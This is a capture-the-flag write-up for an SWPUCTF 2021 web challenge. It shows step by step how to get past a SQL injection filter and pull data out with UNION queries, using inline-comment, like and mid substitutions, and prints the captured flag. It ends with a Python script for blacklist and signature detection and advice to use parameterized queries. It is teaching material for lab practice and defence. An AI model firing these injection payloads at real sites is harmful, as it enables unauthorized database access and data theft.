[SWPUCTF 2021 新生赛]sql
Source: NSSCTF
Category: web
Topic: SQL injection
1. The familiar Jie-ge page again. Start by determining the quote closure type and the number of echoed columns.
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902203813896.png)
- Determine the closure type:
`/?wllm=1`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204000113.png)
`/?wllm=1'`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204031765.png)
`/?wllm=1'%23`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/t_230902134441_image-20230902204103316.png)
`%23` is the URL encoding of `#`.
Conclusion: the injection point is closed with a single quote.
- Determine the number of echoed columns:
`/?wllm=1' group by 3%23`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204235207.png)
Spaces are filtered here, so we use `/**/` in their place:
`/?wllm=1'/**/group/**/by/**/3%23`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204337367.png)
`/?wllm=1'/**/group/**/by/**/4%23`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204426345.png)
Conclusion: 3 columns are echoed.
2. Try a UNION injection
- Find the echoed positions:
`/?wllm=-1'/**/union/**/select/**/1,2,3%23`:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204655967.png)
- Dump the database name:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902204718147.png)
- Dump the table names:
`/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902204928173.png)
`=` is filtered here, so we use `like` instead.
- Go straight to the contents of `LTLT_flag`; dump the column names:
`/?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134524_image-20230902205107049.png)
- Query the flag:
`/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902205217716.png)
The output is truncated, so we read it in pieces with `substring`:
`/?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(flag),1,30)/**/from/**/test_db.LTLT_flag%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902212438008.png)
That is filtered too, so try `mid` instead:
`/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902212907354.png)
`/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/test_db.LTLT_flag%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902212922216.png)
`/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/test_db.LTLT_flag%23`
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902212941548.png)
Note: the maximum echo length with `mid` is 20 characters.
Concatenating the pieces gives the flag:
`NSSCTF{ad72b551-c7a7-4a13-abf2-3a0311d8d7cf}`
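Each filter met in this challenge (spaces, `=`, `substring`) was sidestepped by a near-equivalent (`/**/`, `like`, `mid`). As an added example that is not part of the original writeup, the Python script below shows why a keyword blacklist is the wrong control: it models the challenge's filter as a substring blacklist over the decoded parameter (an assumption, since the page shows no server code), feeds it the writeup's own payloads plus a benign value, and compares the verdict with a detector that normalizes the parameter first (percent-decode, collapse `/**/` to whitespace, lowercase) and only then matches on query structure. The request lines are constructed for the example, not captured logs.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests: the writeup's own payloads plus a benign value.
# They are built for this example, not captured from the challenge server.
SAMPLE_REQUESTS = [
    "/?wllm=1",
    "/?wllm=1'%23",
    "/?wllm=1'/**/group/**/by/**/3%23",
    "/?wllm=-1'/**/union/**/select/**/1,2,3%23",
    "/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)"
    "/**/from/**/information_schema.tables/**/where/**/table_schema"
    "/**/like/**/database()%23",
    "/?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(flag),1,30)"
    "/**/from/**/test_db.LTLT_flag%23",
    "/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),1,20)"
    "/**/from/**/test_db.LTLT_flag%23",
    "/?wllm=hello%20world",
]

# Assumption: the challenge filter is modelled as a plain substring blacklist
# over the decoded parameter value. The writeup only observed that a space,
# '=' and 'substring' were rejected; the real server code is not on the page.
CHALLENGE_BLACKLIST = (" ", "=", "substring")


def blacklist_rejects(value: str) -> bool:
    """Mimic the assumed challenge filter: reject on any listed substring."""
    return any(token in value for token in CHALLENGE_BLACKLIST)


_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Signatures are evaluated on the normalized value, so /**/ standing in for
# whitespace, 'like' standing in for '=', and mid() standing in for substring()
# no longer hide the structure of the injected query.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b")),
    ("column-count-probe", re.compile(r"\b(?:group|order)\s+by\s+\d+")),
    ("schema-enumeration", re.compile(r"\binformation_schema\.")),
    ("string-slicing", re.compile(r"\b(?:mid|substr|substring)\s*\(")),
    ("quote-then-comment", re.compile(r"'.*#")),
]


def normalize(value: str) -> str:
    """Replace inline comments with a space, fold whitespace, lowercase."""
    value = _INLINE_COMMENT.sub(" ", value)
    value = re.sub(r"\s+", " ", value)
    return value.strip().lower()


def get_param(path: str, name: str = "wllm") -> str:
    """Extract one query parameter; parse_qs percent-decodes it (%23 -> #)."""
    values = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return values.get(name, [""])[0]


def analyze(path: str) -> dict:
    """Return the blacklist verdict and the normalized-signature findings."""
    value = get_param(path)
    findings = [label for label, rx in SIGNATURES if rx.search(normalize(value))]
    return {"blacklist_rejects": blacklist_rejects(value), "findings": findings}


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        result = analyze(req)
        verdict = "BLOCKED" if result["blacklist_rejects"] else "allowed"
        print(f"{verdict:8} {', '.join(result['findings']) or '-':60} {req}")
```

Running it shows the blacklist letting every `/**/`, `like` and `mid` payload through while rejecting the harmless `hello world`, and the normalized signatures flagging each stage of the writeup (column-count probe, union select, information_schema enumeration, mid/substring slicing). Normalizing before matching is a detection aid for logs and WAF rules; the fix for the injection itself is a parameterized query, where `wllm` is bound as a value and never becomes part of the SQL text.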
Date: 2023.9.2
Author: y0Zero
Tags: group,23,union,SWPUCTF,wllm,flag,2021,sql,select From: https://www.cnblogs.com/bkofyZ/p/17674252.html